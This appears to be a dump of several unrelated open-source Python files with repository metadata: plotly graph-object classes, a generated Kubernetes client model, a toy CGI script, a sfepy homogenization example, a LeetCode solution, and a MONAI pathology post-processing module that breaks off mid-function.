# Populate data dict with properties
# ----------------------------------
_v = arg.pop("dtickrange", None)
self["dtickrange"] = dtickrange if dtickrange is not None else _v
_v = arg.pop("enabled", None)
self["enabled"] = enabled if enabled is not None else _v
_v = arg.pop("name", None)
self["name"] = name if name is not None else _v
_v = arg.pop("templateitemname", None)
self["templateitemname"] = (
templateitemname if templateitemname is not None else _v
)
_v = arg.pop("value", None)
self["value"] = value if value is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly_study.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tickfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
Returns
-------
str
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
Returns
-------
int|float
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "choropleth.colorbar"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
"""
def __init__(self, arg=None, color=None, family=None, size=None, **kwargs):
"""
Construct a new Tickfont object
Sets the color bar's tick label font
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
plotly_study.graph_objs.choropleth.colorbar.Tickfont
color
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
Tickfont
"""
super(Tickfont, self).__init__("tickfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly_study.graph_objs.choropleth.colorbar.Tickfont
constructor must be a dict or
an instance of plotly_study.graph_objs.choropleth.colorbar.Tickfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly_study.validators.choropleth.colorbar import tickfont as v_tickfont
# Initialize validators
# ---------------------
self._validators["color"] = v_tickfont.ColorValidator()
self._validators["family"] = v_tickfont.FamilyValidator()
self._validators["size"] = v_tickfont.SizeValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
__all__ = ["Tickfont", "Tickformatstop", "Tickformatstop", "Title", "title"]
from plotly_study.graph_objs.choropleth.colorbar import title
| [
"[email protected]"
]
| |
4e1af43587d5fdb2600cc976d39472607dc4bf30 | 32c56293475f49c6dd1b0f1334756b5ad8763da9 | /google-cloud-sdk/lib/third_party/kubernetes/client/models/v1beta2_replica_set_status.py | 0c2f63cef33a6595d25265d9415af4140bce5378 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
]
| permissive | bopopescu/socialliteapp | b9041f17f8724ee86f2ecc6e2e45b8ff6a44b494 | 85bb264e273568b5a0408f733b403c56373e2508 | refs/heads/master | 2022-11-20T03:01:47.654498 | 2020-02-01T20:29:43 | 2020-02-01T20:29:43 | 282,403,750 | 0 | 0 | MIT | 2020-07-25T08:31:59 | 2020-07-25T08:31:59 | null | UTF-8 | Python | false | false | 8,428 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen
https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta2ReplicaSetStatus(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name and the value is attribute
type.
attribute_map (dict): The key is attribute name and the value is json key
in definition.
"""
swagger_types = {
'available_replicas': 'int',
'conditions': 'list[V1beta2ReplicaSetCondition]',
'fully_labeled_replicas': 'int',
'observed_generation': 'int',
'ready_replicas': 'int',
'replicas': 'int'
}
attribute_map = {
'available_replicas': 'availableReplicas',
'conditions': 'conditions',
'fully_labeled_replicas': 'fullyLabeledReplicas',
'observed_generation': 'observedGeneration',
'ready_replicas': 'readyReplicas',
'replicas': 'replicas'
}
def __init__(self,
available_replicas=None,
conditions=None,
fully_labeled_replicas=None,
observed_generation=None,
ready_replicas=None,
replicas=None):
"""
V1beta2ReplicaSetStatus - a model defined in Swagger
"""
self._available_replicas = None
self._conditions = None
self._fully_labeled_replicas = None
self._observed_generation = None
self._ready_replicas = None
self._replicas = None
self.discriminator = None
if available_replicas is not None:
self.available_replicas = available_replicas
if conditions is not None:
self.conditions = conditions
if fully_labeled_replicas is not None:
self.fully_labeled_replicas = fully_labeled_replicas
if observed_generation is not None:
self.observed_generation = observed_generation
if ready_replicas is not None:
self.ready_replicas = ready_replicas
self.replicas = replicas
@property
def available_replicas(self):
"""
Gets the available_replicas of this V1beta2ReplicaSetStatus.
The number of available replicas (ready for at least minReadySeconds)
for this replica set.
:return: The available_replicas of this V1beta2ReplicaSetStatus.
:rtype: int
"""
return self._available_replicas
@available_replicas.setter
def available_replicas(self, available_replicas):
"""
Sets the available_replicas of this V1beta2ReplicaSetStatus.
The number of available replicas (ready for at least minReadySeconds)
for this replica set.
:param available_replicas: The available_replicas of this
V1beta2ReplicaSetStatus.
:type: int
"""
self._available_replicas = available_replicas
@property
def conditions(self):
"""
Gets the conditions of this V1beta2ReplicaSetStatus.
Represents the latest available observations of a replica set's current
state.
:return: The conditions of this V1beta2ReplicaSetStatus.
:rtype: list[V1beta2ReplicaSetCondition]
"""
return self._conditions
@conditions.setter
def conditions(self, conditions):
"""
Sets the conditions of this V1beta2ReplicaSetStatus.
Represents the latest available observations of a replica set's current
state.
:param conditions: The conditions of this V1beta2ReplicaSetStatus.
:type: list[V1beta2ReplicaSetCondition]
"""
self._conditions = conditions
@property
def fully_labeled_replicas(self):
"""
Gets the fully_labeled_replicas of this V1beta2ReplicaSetStatus.
The number of pods that have labels matching the labels of the pod
template of the replicaset.
:return: The fully_labeled_replicas of this V1beta2ReplicaSetStatus.
:rtype: int
"""
return self._fully_labeled_replicas
@fully_labeled_replicas.setter
def fully_labeled_replicas(self, fully_labeled_replicas):
"""
Sets the fully_labeled_replicas of this V1beta2ReplicaSetStatus.
The number of pods that have labels matching the labels of the pod
template of the replicaset.
:param fully_labeled_replicas: The fully_labeled_replicas of this
V1beta2ReplicaSetStatus.
:type: int
"""
self._fully_labeled_replicas = fully_labeled_replicas
@property
def observed_generation(self):
"""
Gets the observed_generation of this V1beta2ReplicaSetStatus.
ObservedGeneration reflects the generation of the most recently observed
ReplicaSet.
:return: The observed_generation of this V1beta2ReplicaSetStatus.
:rtype: int
"""
return self._observed_generation
@observed_generation.setter
def observed_generation(self, observed_generation):
"""
Sets the observed_generation of this V1beta2ReplicaSetStatus.
ObservedGeneration reflects the generation of the most recently observed
ReplicaSet.
:param observed_generation: The observed_generation of this
V1beta2ReplicaSetStatus.
:type: int
"""
self._observed_generation = observed_generation
@property
def ready_replicas(self):
"""
Gets the ready_replicas of this V1beta2ReplicaSetStatus.
The number of ready replicas for this replica set.
:return: The ready_replicas of this V1beta2ReplicaSetStatus.
:rtype: int
"""
return self._ready_replicas
@ready_replicas.setter
def ready_replicas(self, ready_replicas):
"""
Sets the ready_replicas of this V1beta2ReplicaSetStatus.
The number of ready replicas for this replica set.
:param ready_replicas: The ready_replicas of this
V1beta2ReplicaSetStatus.
:type: int
"""
self._ready_replicas = ready_replicas
@property
def replicas(self):
"""
Gets the replicas of this V1beta2ReplicaSetStatus.
Replicas is the most recently oberved number of replicas. More info:
https://kubernetes.io/docs/concepts/workloads/controllers/replicationcontroller/#what-is-a-replicationcontroller
:return: The replicas of this V1beta2ReplicaSetStatus.
:rtype: int
"""
return self._replicas
@replicas.setter
def replicas(self, replicas):
"""
Sets the replicas of this V1beta2ReplicaSetStatus.
Replicas is the most recently oberved number of replicas. More info:
https://kubernetes.io/docs/concepts/workloads/controllers/replicationcontroller/#what-is-a-replicationcontroller
:param replicas: The replicas of this V1beta2ReplicaSetStatus.
:type: int
"""
if replicas is None:
raise ValueError('Invalid value for `replicas`, must not be `None`')
self._replicas = replicas
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, 'to_dict') else x, value))
elif hasattr(value, 'to_dict'):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], 'to_dict') else item, value.items()))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta2ReplicaSetStatus):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
]
| |
e47dce9c9c5eed815ffa55ca6d0aed20f77b9a8f | 80b2700b6f9940ee672f42124b2cb8a81836426e | /cgi/cgi.cgi | 5d4924622945cb130546139be58763ec78e549d9 | [
"Apache-2.0"
]
| permissive | Vayne-Lover/Python | 6c1ac5c0d62ecdf9e3cf68d3e659d49907bb29d4 | 79cfe3d6971a7901d420ba5a7f52bf4c68f6a1c1 | refs/heads/master | 2020-04-12T08:46:13.128989 | 2017-04-21T06:36:40 | 2017-04-21T06:36:40 | 63,305,306 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 335 | cgi | #!/usr/local/bin/python
import cgi
form=cgi.FieldStirage()
name=form.getvalue('name','world')
print '''
<html>
<head>
<title>Page</title>
</head>
<body>
<h1>Hello,%s</h1>
<form action='cgi.cgi'>
Change name<input type='text' name='name' />
<input type='submit'/>
</form>
</body>
</html>
'''%name
| [
"[email protected]"
]
| |
6a73d876aea17be4a376a5907de6235230844d3e | 1a4353a45cafed804c77bc40e843b4ad463c2a0e | /examples/homogenization/linear_homogenization.py | 1682971d9827a59e1fc33d4bc53001c774b6fcc9 | [
"BSD-3-Clause"
]
| permissive | shrutig/sfepy | 9b509866d76db5af9df9f20467aa6e4b23600534 | 87523c5a295e5df1dbb4a522b600c1ed9ca47dc7 | refs/heads/master | 2021-01-15T09:28:55.804598 | 2014-01-24T14:28:28 | 2014-01-30T16:25:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,370 | py | # 04.08.2009
#!
#! Homogenization: Linear Elasticity
#! =================================
#$ \centerline{Example input file, \today}
#! Homogenization of heterogeneous linear elastic material
import sfepy.fem.periodic as per
from sfepy.mechanics.matcoefs import stiffness_from_youngpoisson
from sfepy.homogenization.utils import define_box_regions
import sfepy.homogenization.coefs_base as cb
from sfepy import data_dir
from sfepy.base.base import Struct
from sfepy.homogenization.recovery import compute_micro_u, compute_stress_strain_u, compute_mac_stress_part
def recovery_le( pb, corrs, macro ):
out = {}
dim = corrs['corrs_le']['u_00'].shape[1]
mic_u = - compute_micro_u( corrs['corrs_le'], macro['strain'], 'u', dim )
out['u_mic'] = Struct( name = 'output_data',
mode = 'vertex', data = mic_u,
var_name = 'u', dofs = None )
stress_Y, strain_Y = compute_stress_strain_u( pb, 'i', 'Y', 'mat.D', 'u', mic_u )
stress_Y += compute_mac_stress_part( pb, 'i', 'Y', 'mat.D', 'u', macro['strain'] )
strain = macro['strain'] + strain_Y
out['cauchy_strain'] = Struct( name = 'output_data',
mode = 'cell', data = strain,
dofs = None )
out['cauchy_stress'] = Struct( name = 'output_data',
mode = 'cell', data = stress_Y,
dofs = None )
return out
#! Mesh
#! ----
filename_mesh = data_dir + '/meshes/3d/matrix_fiber.mesh'
dim = 3
region_lbn = (0, 0, 0)
region_rtf = (1, 1, 1)
#! Regions
#! -------
#! Regions, edges, ...
regions = {
'Y' : 'all',
'Ym' : 'cells of group 1',
'Yc' : 'cells of group 2',
}
regions.update( define_box_regions( dim, region_lbn, region_rtf ) )
#! Materials
#! ---------
materials = {
'mat' : ({'D' : {'Ym': stiffness_from_youngpoisson(dim, 7.0e9, 0.4),
'Yc': stiffness_from_youngpoisson(dim, 70.0e9, 0.2)}},),
}
#! Fields
#! ------
#! Scalar field for corrector basis functions.
fields = {
'corrector' : ('real', dim, 'Y', 1),
}
#! Variables
#! ---------
#! Unknown and corresponding test variables. Parameter fields
#! used for evaluation of homogenized coefficients.
variables = {
'u' : ('unknown field', 'corrector', 0),
'v' : ('test field', 'corrector', 'u'),
'Pi' : ('parameter field', 'corrector', 'u'),
'Pi1' : ('parameter field', 'corrector', '(set-to-None)'),
'Pi2' : ('parameter field', 'corrector', '(set-to-None)'),
}
#! Functions
functions = {
'match_x_plane' : (per.match_x_plane,),
'match_y_plane' : (per.match_y_plane,),
'match_z_plane' : (per.match_z_plane,),
}
#! Boundary Conditions
#! -------------------
#! Fixed nodes.
ebcs = {
'fixed_u' : ('Corners', {'u.all' : 0.0}),
}
if dim == 3:
epbcs = {
'periodic_x' : (['Left', 'Right'], {'u.all' : 'u.all'}, 'match_x_plane'),
'periodic_y' : (['Near', 'Far'], {'u.all' : 'u.all'}, 'match_y_plane'),
'periodic_z' : (['Top', 'Bottom'], {'u.all' : 'u.all'}, 'match_z_plane'),
}
else:
epbcs = {
'periodic_x' : (['Left', 'Right'], {'u.all' : 'u.all'}, 'match_x_plane'),
'periodic_y' : (['Bottom', 'Top'], {'u.all' : 'u.all'}, 'match_y_plane'),
}
all_periodic = ['periodic_%s' % ii for ii in ['x', 'y', 'z'][:dim] ]
#! Integrals
#! ---------
#! Define the integral type Volume/Surface and quadrature rule.
integrals = {
'i' : 2,
}
#! Options
#! -------
#! Various problem-specific options.
options = {
'coefs' : 'coefs',
'requirements' : 'requirements',
'ls' : 'ls', # linear solver to use
'volume' : { 'variables' : ['u'],
'expression' : 'd_volume.i.Y( u )' },
'output_dir' : 'output',
'coefs_filename' : 'coefs_le',
'recovery_hook' : 'recovery_le',
}
#! Equations
#! ---------
#! Equations for corrector functions.
equation_corrs = {
'balance_of_forces' :
"""dw_lin_elastic.i.Y(mat.D, v, u ) =
- dw_lin_elastic.i.Y(mat.D, v, Pi )"""
}
#! Expressions for homogenized linear elastic coefficients.
expr_coefs = """dw_lin_elastic.i.Y(mat.D, Pi1, Pi2 )"""
#! Coefficients
#! ------------
#! Definition of homogenized acoustic coefficients.
def set_elastic(variables, ir, ic, mode, pis, corrs_rs):
mode2var = {'row' : 'Pi1', 'col' : 'Pi2'}
val = pis.states[ir, ic]['u'] + corrs_rs.states[ir, ic]['u']
variables[mode2var[mode]].set_data(val)
coefs = {
'D' : {
'requires' : ['pis', 'corrs_rs'],
'expression' : expr_coefs,
'set_variables' : set_elastic,
'class' : cb.CoefSymSym,
},
'filenames' : {},
}
requirements = {
'pis' : {
'variables' : ['u'],
'class' : cb.ShapeDimDim,
},
'corrs_rs' : {
'requires' : ['pis'],
'ebcs' : ['fixed_u'],
'epbcs' : all_periodic,
'equations' : equation_corrs,
'set_variables' : [('Pi', 'pis', 'u')],
'class' : cb.CorrDimDim,
'save_name' : 'corrs_le',
'dump_variables' : ['u'],
},
}
#! Solvers
#! -------
#! Define linear and nonlinear solver.
solvers = {
'ls' : ('ls.umfpack', {}),
'newton' : ('nls.newton', {'i_max' : 1,
'eps_a' : 1e-4,
'problem' : 'nonlinear',
})
}
| [
"[email protected]"
]
| |
7b96f4da183d09e021d9952a0dcf54bf9f5af32f | c898af4efbfaeba8fa91d86bc97f7f6ee2381564 | /easy/561. Array Partition I/test.py | e9fa5a72142fdad8d3321c524413f6509e273cb4 | []
| no_license | weiweiECNU/leetcode | 5941300131e41614ccc043cc94ba5c03e4342165 | 1c817338f605f84acb9126a002c571dc5e28a4f7 | refs/heads/master | 2020-06-20T18:33:28.157763 | 2019-08-20T07:52:14 | 2019-08-20T07:52:14 | 197,209,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | # https://leetcode.com/problems/array-partition-i/
# 比较大的数字一定要和比较大的数字在一起才行,否则括号内的小的结果是较小的数字。
# 所以先排序,排序后的结果找每个组中数据的第一个数字即可。
# 时间复杂度是O(NlogN),空间复杂度是O(1).
class Solution:
def arrayPairSum(self, nums: List[int]) -> int:
return sum(sorted(nums)[::2]) | [
"[email protected]"
]
| |
e05664ff87e83f760833b263ea27a3411e4d24e3 | ca446c7e21cd1fb47a787a534fe308203196ef0d | /followthemoney/types/number.py | 4072e01a3017fa934f2ce8208185ed2b55969689 | [
"MIT"
]
| permissive | critocrito/followthemoney | 1a37c277408af504a5c799714e53e0f0bd709f68 | bcad19aedc3b193862018a3013a66869e115edff | refs/heads/master | 2020-06-12T09:56:13.867937 | 2019-06-28T08:23:54 | 2019-06-28T08:23:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | from followthemoney.types.common import PropertyType
from followthemoney.util import defer as _
class NumberType(PropertyType):
name = 'number'
label = _('Number')
plural = _('Numbers')
matchable = False
| [
"[email protected]"
]
| |
5554901defcf910a7eb1e706f39e14f5d12a7f72 | 5dccb539427d6bd98b4b4eab38b524dc930229c7 | /monai/apps/pathology/transforms/post/array.py | 5289dc101cbcd35a1374ebbfa721ba2ba02f1d52 | [
"Apache-2.0"
]
| permissive | Warvito/MONAI | 794aca516e6b3ed365ee912164743a3696735cf3 | 8eceabf281ab31ea4bda0ab8a6d2c8da06027e82 | refs/heads/dev | 2023-04-27T19:07:56.041733 | 2023-03-27T09:23:53 | 2023-03-27T09:23:53 | 512,893,750 | 0 | 0 | Apache-2.0 | 2022-08-05T16:51:05 | 2022-07-11T20:04:47 | null | UTF-8 | Python | false | false | 36,850 | py | # Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import warnings
from typing import Callable, Sequence
import numpy as np
import torch
from monai.config.type_definitions import DtypeLike, NdarrayOrTensor
from monai.transforms import (
Activations,
AsDiscrete,
BoundingRect,
FillHoles,
GaussianSmooth,
RemoveSmallObjects,
SobelGradients,
)
from monai.transforms.transform import Transform
from monai.transforms.utils_pytorch_numpy_unification import max, maximum, min, sum, unique
from monai.utils import TransformBackends, convert_to_numpy, optional_import
from monai.utils.misc import ensure_tuple_rep
from monai.utils.type_conversion import convert_to_dst_type
label, _ = optional_import("scipy.ndimage.measurements", name="label")
disk, _ = optional_import("skimage.morphology", name="disk")
opening, _ = optional_import("skimage.morphology", name="opening")
watershed, _ = optional_import("skimage.segmentation", name="watershed")
find_contours, _ = optional_import("skimage.measure", name="find_contours")
centroid, _ = optional_import("skimage.measure", name="centroid")
__all__ = [
"Watershed",
"GenerateWatershedMask",
"GenerateInstanceBorder",
"GenerateDistanceMap",
"GenerateWatershedMarkers",
"GenerateSuccinctContour",
"GenerateInstanceContour",
"GenerateInstanceCentroid",
"GenerateInstanceType",
"HoVerNetInstanceMapPostProcessing",
"HoVerNetNuclearTypePostProcessing",
]
class Watershed(Transform):
"""
Use `skimage.segmentation.watershed` to get instance segmentation results from images.
See: https://scikit-image.org/docs/stable/api/skimage.segmentation.html#skimage.segmentation.watershed.
Args:
connectivity: an array with the same number of dimensions as image whose non-zero elements indicate
neighbors for connection. Following the scipy convention, default is a one-connected array of
the dimension of the image.
dtype: target data content type to convert, default is np.int64.
"""
backend = [TransformBackends.NUMPY]
def __init__(self, connectivity: int | None = 1, dtype: DtypeLike = np.int64) -> None:
self.connectivity = connectivity
self.dtype = dtype
def __call__(
self, image: NdarrayOrTensor, mask: NdarrayOrTensor | None = None, markers: NdarrayOrTensor | None = None
) -> NdarrayOrTensor:
"""
Args:
image: image where the lowest value points are labeled first. Shape must be [1, H, W, [D]].
mask: optional, the same shape as image. Only points at which mask == True will be labeled.
If None (no mask given), it is a volume of all 1s.
markers: optional, the same shape as image. The desired number of markers, or an array marking
the basins with the values to be assigned in the label matrix. Zero means not a marker.
If None (no markers given), the local minima of the image are used as markers.
"""
image = convert_to_numpy(image)
markers = convert_to_numpy(markers)
mask = convert_to_numpy(mask)
instance_seg = watershed(image, markers=markers, mask=mask, connectivity=self.connectivity)
return convert_to_dst_type(instance_seg, image, dtype=self.dtype)[0]
class GenerateWatershedMask(Transform):
"""
generate mask used in `watershed`. Only points at which mask == True will be labeled.
Args:
activation: the activation layer to be applied on the input probability map.
It can be "softmax" or "sigmoid" string, or any callable. Defaults to "softmax".
threshold: an optional float value to threshold to binarize probability map.
If not provided, defaults to 0.5 when activation is not "softmax", otherwise None.
min_object_size: objects smaller than this size (in pixel) are removed. Defaults to 10.
dtype: target data content type to convert, default is np.uint8.
"""
backend = [TransformBackends.NUMPY]
def __init__(
self,
activation: str | Callable = "softmax",
threshold: float | None = None,
min_object_size: int = 10,
dtype: DtypeLike = np.uint8,
) -> None:
self.dtype = dtype
# set activation layer
use_softmax = False
use_sigmoid = False
activation_fn = None
if isinstance(activation, str):
if activation.lower() == "softmax":
use_softmax = True
elif activation.lower() == "sigmoid":
use_sigmoid = True
else:
raise ValueError(
f"The activation should be 'softmax' or 'sigmoid' string, or any callable. '{activation}' was given."
)
elif callable(activation):
activation_fn = activation
else:
raise ValueError(f"The activation type should be either str or callable. '{type(activation)}' was given.")
self.activation = Activations(softmax=use_softmax, sigmoid=use_sigmoid, other=activation_fn)
# set discretization transform
if not use_softmax and threshold is None:
threshold = 0.5
self.as_discrete = AsDiscrete(threshold=threshold, argmax=use_softmax)
# set small object removal transform
self.remove_small_objects = RemoveSmallObjects(min_size=min_object_size) if min_object_size > 0 else None
def __call__(self, prob_map: NdarrayOrTensor) -> NdarrayOrTensor:
"""
Args:
prob_map: probability map of segmentation, shape must be [C, H, W, [D]]
"""
pred = self.activation(prob_map)
pred = self.as_discrete(pred)
pred = convert_to_numpy(pred)
pred = label(pred)[0]
if self.remove_small_objects is not None:
pred = self.remove_small_objects(pred)
pred[pred > 0] = 1 # type: ignore
return convert_to_dst_type(pred, prob_map, dtype=self.dtype)[0]
class GenerateInstanceBorder(Transform):
"""
Generate instance border by hover map. The more parts of the image that cannot be identified as foreground areas,
the larger the grey scale value. The grey value of the instance's border will be larger.
Args:
kernel_size: the size of the Sobel kernel. Defaults to 5.
dtype: target data type to convert to. Defaults to np.float32.
Raises:
ValueError: when the `mask` shape is not [1, H, W].
ValueError: when the `hover_map` shape is not [2, H, W].
"""
backend = [TransformBackends.NUMPY]
def __init__(self, kernel_size: int = 5, dtype: DtypeLike = np.float32) -> None:
self.dtype = dtype
self.sobel_gradient = SobelGradients(kernel_size=kernel_size)
def __call__(self, mask: NdarrayOrTensor, hover_map: NdarrayOrTensor) -> NdarrayOrTensor: # type: ignore
"""
Args:
mask: binary segmentation map, the output of :py:class:`GenerateWatershedMask`.
Shape must be [1, H, W] or [H, W].
hover_map: horizontal and vertical distances of nuclear pixels to their centres of mass. Shape must be [2, H, W].
The first and second channel represent the horizontal and vertical maps respectively. For more details refer
to papers: https://arxiv.org/abs/1812.06499.
"""
if len(hover_map.shape) != 3:
raise ValueError(f"The hover map should have the shape of [C, H, W], but got {hover_map.shape}.")
if len(mask.shape) == 3:
if mask.shape[0] != 1:
raise ValueError(f"The mask should have only one channel, but got {mask.shape[0]}.")
elif len(mask.shape) == 2:
mask = mask[None]
else:
raise ValueError(f"The mask should have the shape of [1, H, W] or [H, W], but got {mask.shape}.")
if hover_map.shape[0] != 2:
raise ValueError(f"Suppose the hover map only has two channels, but got {hover_map.shape[0]}")
hover_h = hover_map[0:1, ...]
hover_v = hover_map[1:2, ...]
hover_h_min, hover_h_max = min(hover_h), max(hover_h)
hover_v_min, hover_v_max = min(hover_v), max(hover_v)
if (hover_h_max - hover_h_min) == 0 or (hover_v_max - hover_v_min) == 0:
raise ValueError("Not a valid hover map, please check your input")
hover_h = (hover_h - hover_h_min) / (hover_h_max - hover_h_min)
hover_v = (hover_v - hover_v_min) / (hover_v_max - hover_v_min)
sobelh = self.sobel_gradient(hover_h)[1, ...]
sobelv = self.sobel_gradient(hover_v)[0, ...]
sobelh_min, sobelh_max = min(sobelh), max(sobelh)
sobelv_min, sobelv_max = min(sobelv), max(sobelv)
if (sobelh_max - sobelh_min) == 0 or (sobelv_max - sobelv_min) == 0:
raise ValueError("Not a valid sobel gradient map")
sobelh = 1 - (sobelh - sobelh_min) / (sobelh_max - sobelh_min)
sobelv = 1 - (sobelv - sobelv_min) / (sobelv_max - sobelv_min)
# combine the h & v values using max
overall = maximum(sobelh, sobelv)
overall = overall - (1 - mask)
overall[overall < 0] = 0
return convert_to_dst_type(overall, mask, dtype=self.dtype)[0]
class GenerateDistanceMap(Transform):
"""
Generate distance map.
In general, the instance map is calculated from the distance to the background.
Here, we use 1 - "instance border map" to generate the distance map.
Nuclei values form mountains so invert them to get basins.
Args:
smooth_fn: smoothing function for distance map, which can be any callable object.
If not provided :py:class:`monai.transforms.GaussianSmooth()` is used.
dtype: target data type to convert to. Defaults to np.float32.
"""
backend = [TransformBackends.NUMPY]
def __init__(self, smooth_fn: Callable | None = None, dtype: DtypeLike = np.float32) -> None:
self.smooth_fn = smooth_fn if smooth_fn is not None else GaussianSmooth()
self.dtype = dtype
def __call__(self, mask: NdarrayOrTensor, instance_border: NdarrayOrTensor) -> NdarrayOrTensor: # type: ignore
"""
Args:
mask: binary segmentation map, the output of :py:class:`GenerateWatershedMask`.
Shape must be [1, H, W] or [H, W].
instance_border: instance border map, the output of :py:class:`GenerateInstanceBorder`.
Shape must be [1, H, W].
"""
if len(mask.shape) == 3:
if mask.shape[0] != 1:
raise ValueError(f"The mask should have only one channel, but got {mask.shape[0]}.")
elif len(mask.shape) == 2:
mask = mask[None]
else:
